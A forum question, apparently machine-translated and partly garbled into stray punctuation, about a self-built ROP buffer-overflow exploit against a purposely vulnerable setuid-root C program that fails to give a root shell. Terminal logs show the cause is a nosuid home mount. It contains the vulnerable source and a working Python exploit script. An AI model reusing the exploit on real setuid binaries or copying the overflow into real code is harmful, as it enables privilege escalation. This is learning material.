I have followed several bufferoverflow operation manuals. But my problem is that I can’t open the root shell, I always get the normal user shell. I checked the following items
I re-checked the following points, but still I could not get the real root shell:
- I correctly set the root binary owner and also set the s (check) flag
- I checked that the exploit that I am using is working correctly, the correct addresses are used for system @plt and exit @plt, and the values are loaded correctly in rdi via pop rdi; ret; segments I still get the shell, but not the root shell, as expected; (Check)
- I heard that dashes and bash are currently rolling back privileges, and this binding / bin / sh to / bin / zsh will help, but that didn't help me; still getting non root shell (check, approach didn't work for me)
- I also tried calling setuid (0) and seteuid (0) to test in binary format. there is still no root shell; (check does not work for me)
- I also noticed that some people set / proc / sys / kernel / yama / ptrace _scope to 0 (see the message here) see the message here , but it is not true for me (the value is set to 1, and I never touched it ) (check, my value is set to 1, and this should be fine)
- I am using linux mint 18.1 serena, is there perhaps an additional security feature that reduces privileges and prevents the root shell?
- . c python script ( vuln()); shell() , @plt ( )
- 'gcc -fno-stack-protector -o ghost ghost.c' ,
- , ? ?
.
Zaphoxx
c:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void shell(){
system("/bin/sh");
exit(0);
}
int vuln(){
char buf[4];
ssize_t l=0;
printf("[+] input: ");
l=read(0,buf,128);
printf("[+] recv: ");
write(1,buf,l);
return 0;
}
int main(){
setuid(0);
seteuid(0);
vuln();
return 0;
}
python exploit script :
from struct import *
from subprocess import call
poprdi=0x4007e3
system_plt=0x400560
exit_plt=0x4005a0
shell=0x400804
buf=b''
buf+=bytearray("A","utf-8")*24
buf+=pack("<Q",poprdi)
buf+=pack("<Q",shell)
buf+=pack("<Q",system_plt)
buf+=pack("<Q",poprdi)
buf+=pack("<Q",0)
buf+=pack("<Q",exit_plt)
with open("pwn","w") as p:
p.write(buf)
:
execve() , , :
zaphoxx@zaphoxx ~/github/ghostInTheShell $ vim shellcode.c
zaphoxx@zaphoxx ~/github/ghostInTheShell $ gcc -fno-stack-protector -o shell shellcode.c
zaphoxx@zaphoxx ~/github/ghostInTheShell $ sudo chown root:root shell ; sudo chmod 4755 shell
zaphoxx@zaphoxx ~/github/ghostInTheShell $ ll shell
-rwsr-xr-x 1 root root 8608 Oct 17 21:29 shell*
zaphoxx@zaphoxx ~/github/ghostInTheShell $ ./shell
$ id
uid=1000(zaphoxx) gid=1000(zaphoxx) groups=1000(zaphoxx),4(adm),24(cdrom),27(sudo),30(dip),33(www-data),46(plugdev),113(lpadmin),130(sambashare)
$ whoami
zaphoxx
$ exit
zaphoxx@zaphoxx ~/github/ghostInTheShell $ cat shellcode.c
int main(){
char *name[2];
name[0]="/bin/sh";
name[1]=NULL;
execve(name[0],name,NULL);
}
zaphoxx@zaphoxx ~/github/ghostInTheShell $
;
/bin/sh /bin/zsh, , . :
zaphoxx@zaphoxx ~/github/ghostInTheShell $ ll $(which sh)
lrwxrwxrwx 1 root root 12 Oct 15 22:09 /bin/sh -> /usr/bin/zsh*
zaphoxx@zaphoxx ~/github/ghostInTheShell $
, '/usr/bin/id' , , , :
zaphoxx@zaphoxx ~/github/ghostInTheShell $ ./ghost < pwn
uid=1000(zaphoxx) gid=1000(zaphoxx) groups=1000(zaphoxx),4(adm),24(cdrom),27(sudo),30(dip),33(www-data),46(plugdev),113(lpadmin),130(sambashare)
[+] recv: AAAAAAAAHzaphoxx@zaphoxx ~/github/ghostInTheShell $ ll ./ghost
-rwsr-xr-x 1 root root 8816 Oct 17 22:25 ./ghost*
zaphoxx@zaphoxx ~/github/ghostInTheShell $
zaphoxx@zaphoxx ~/github/ghostInTheShell $ cat ghost.c
void shell(){
system("/usr/bin/id");
exit(0);
}
int vuln(){
char buf[4];
ssize_t l=0;
l=read(0,buf,128);
printf("[+] recv: %s",buf);
//write(1,buf,l);
return 0;
}
int main(){
//shell();
//setbuf(stdout,0);
//setuid(0);
//seteuid(0);
vuln();
return 0;
}
zaphoxx@zaphoxx ~/github/ghostInTheShell $
UPDATE: K.A.Buhr /proc/mounts nosuid :
zaphoxx@zaphoxx ~ $ cat /proc/mounts | grep zaphoxx
/home/zaphoxx/.Private /home/zaphoxx ecryptfs rw,nosuid,nodev,relatime
, , -, . nosuid, ()?